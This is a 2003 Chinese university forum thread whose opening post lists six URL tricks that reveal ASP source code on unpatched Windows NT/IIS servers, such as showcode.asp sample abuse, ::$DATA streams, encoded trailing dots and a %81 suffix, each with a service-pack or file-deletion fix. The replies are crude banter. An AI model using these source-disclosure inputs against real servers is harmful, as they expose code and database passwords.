设为首页

广西经贸职业技术学院论坛

 忘记密码
 免费注册
查看: 510|回复: 3
打印 上一主题 下一主题

偷看ASP原码的6种方法

[复制链接]

该用户从未签到

跳转到指定楼层
楼主
发表于 2003-12-25 08:01:00 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
在没有打Services Pack6补丁的NT server上,至少有6种方法可以看到ASP程序的源代码,它们是: </p><p> 1、http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp <br/> 解决方案:删除showcode.asp </p><p> 2、http://somewhere/something.asp:DATA <br/> 解决方案: 装sp3 </p><p> 3、http://somewhere/something.asp%2e <br/> 解决方案: 装sp4 </p><p> or http://somewhere/something.asp.(加一个点) <br/> 解决方案: 装sp4 </p><p> 4、http://somewhere/something%2e%41sp <br/> 或者 http://somewhere/something%2e%asp <br/> 解决方案: 装sp4 </p><p> 5、http://somewhere/something.asp%81 <br/> 解决方案:装sp6或者打补丁 </p><p> 6、http://somewhere/iissamples/exair/howitworks/code.asp?source=xxx.asp </p><p> 最大的危害莫过于asp文件可以被上述方式读出;数据库密码以明文形式暴露在黑客眼前;<br/>
常上飞翔,梦想飞扬!经贸是我家,建设靠大家~ 人们都说:不在大学论坛里灌过水的大学都像是没读过大学~

该用户从未签到

沙发
发表于 2003-12-25 09:12:00 | 只看该作者
我日******
常上飞翔,梦想飞扬!经贸是我家,建设靠大家~ 人们都说:不在大学论坛里灌过水的大学都像是没读过大学~

该用户从未签到

地板
 楼主| 发表于 2003-12-25 11:44:00 | 只看该作者
我靠你好日
常上飞翔,梦想飞扬!经贸是我家,建设靠大家~ 人们都说:不在大学论坛里灌过水的大学都像是没读过大学~
天涯¢浪子 该用户已被删除
4
发表于 2003-12-25 20:07:00 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
常上飞翔,梦想飞扬!经贸是我家,建设靠大家~ 人们都说:不在大学论坛里灌过水的大学都像是没读过大学~
您需要登录后才可以回帖 登录 | 免费注册

本版积分规则

QQ|版主考核中心|『经贸在线』 ( 桂ICP备15001539号-2  

GMT+8, 2024-11-24 05:09

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表